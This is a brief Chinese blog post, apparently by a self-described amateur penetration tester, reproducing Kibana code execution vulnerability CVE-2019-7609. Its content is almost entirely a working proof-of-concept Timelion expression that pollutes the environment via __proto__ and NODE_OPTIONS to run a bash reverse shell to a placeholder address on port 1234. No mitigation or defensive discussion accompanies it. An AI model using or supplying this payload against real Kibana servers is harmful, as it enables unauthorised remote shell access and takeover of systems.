Kibana < 6.6.1 代码执行漏洞复现CVE-2019-7609

登陆kibana
poc

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/1234 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

posted @ 2019-10-21 09:56 mrhonest 阅读(1975) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

MrHonest

民间渗透测试人员，学网络，学开发！bXJob25lc3RAcXEuY29t

Kibana < 6.6.1 代码执行漏洞复现CVE-2019-7609

公告